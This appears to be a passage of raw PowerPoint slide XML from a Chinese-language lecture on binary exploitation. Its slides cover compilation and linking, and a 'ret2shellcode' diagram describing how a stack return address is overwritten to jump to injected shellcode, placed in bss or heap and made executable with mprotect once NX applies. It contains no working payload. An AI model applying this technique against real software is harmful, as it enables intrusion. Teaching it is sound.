                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3613971"/>
                <a:ext cx="1363200" cy="276712"/>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Text</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3890682"/>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Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="331682"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>shellcode_addr</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10804511" y="1220595"/>
            <a:ext cx="858835" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6572996" y="1502416"/>
            <a:ext cx="380913" cy="4"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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Shape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6763450" y="4536254"/>
            <a:ext cx="3883021" cy="287942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">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dirty="0" err="1"/>
              <a:t>Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6763447" y="1171934"/>
            <a:ext cx="3883024" cy="287942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode we input</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E46CE33E-2848-4445-9B59-658F83F77458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215442" y="1995953"/>
            <a:ext cx="3610748" cy="313932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篡改栈帧上的返回地址为攻击者手动传入的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>所在缓冲区地址</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初期往往将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>直接写入栈缓冲区</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目前由于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>the NX bits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>保护措施的开启，栈缓冲区不可执行，故当下的常用手段变为向 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bss</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缓冲区写入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>或向堆缓冲区写入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>并使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mprotect</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赋予其可执行权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C3D8B2A-4D70-4133-8B65-0320F68FEBFB}"/>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ret2shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3773523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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51DCBC81-C36E-4A6A-839A-B657420011F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2374032"/>
            <a:ext cx="2554103" cy="325563"/>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C Code (p1.c p2.c)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD4CB35-5293-4C26-9202-591B5C102BFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3084132"/>
            <a:ext cx="2554103" cy="325563"/>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Assembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (p1.s p2.s)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFB2AE2D-7A72-40F8-B4C5-27B456BC0702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3794232"/>
            <a:ext cx="2554103" cy="325563"/>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 (p1.o p2.o)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722A2B5D-6B07-4BCD-ABD6-CA7AB0C7877F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4504344"/>
            <a:ext cx="2554103" cy="325563"/>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Executable (p)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Shape 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B03AACC0-31F1-4AC3-9969-CE4BDA91D537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7373052" y="2699595"/>
            <a:ext cx="0" cy="384537"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Shape 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D9C2E90-2CC0-4A01-8F70-498B6D1FA41E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7373052" y="3409695"/>
            <a:ext cx="0" cy="384537"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Shape 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D42C06A-6F40-4A4D-8BC5-5B7F893C187E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7373052" y="4119795"/>
            <a:ext cx="0" cy="384549"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75E35F9E-277A-4362-AF8D-1EA75EB9DF28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7288350" y="2729082"/>
            <a:ext cx="2554103" cy="32556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compiler: gcc -S</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 119">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{599FCD4F-CB15-4937-AA68-7AEE0D275DEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7447775" y="3439182"/>
            <a:ext cx="2554103" cy="32556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assembler: gcc or as</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 120">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38AA1808-83D4-4307-A480-8514FA9EAC19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7288350" y="4149282"/>
            <a:ext cx="2554103" cy="32556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linker: gcc or ld</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05C1D9EE-96D5-4E11-8313-96A2737125A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9304900" y="3794232"/>
            <a:ext cx="2554103" cy="325563"/>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Static Library (.a)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Shape 122">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{022E0D13-5A86-4295-A30F-47D821A87770}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="2"/>
            <a:endCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8650103" y="4119795"/>
            <a:ext cx="1931849" cy="547331"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE03D87-D78A-400E-AAB5-29FB96CD673E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332997" y="2228044"/>
            <a:ext cx="5006499"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从</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源代码到可执行文件的生成过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83E32506-F6CA-49ED-B74A-90582F20BFFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815753" y="2898770"/>
            <a:ext cx="4040985"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编译</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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由</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语言代码生成汇编代码</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汇编</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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由汇编代码生成机器码</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链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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将多个机器码的目标文件链接成一个可执行文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE4950BD-2EDF-4D2A-8F6C-D75517729040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="5889172"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程序的编译与链接</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13330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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6631564" y="305873"/>
            <a:ext cx="3883027" cy="6246254"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5601480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5601480"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3620439"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>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For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
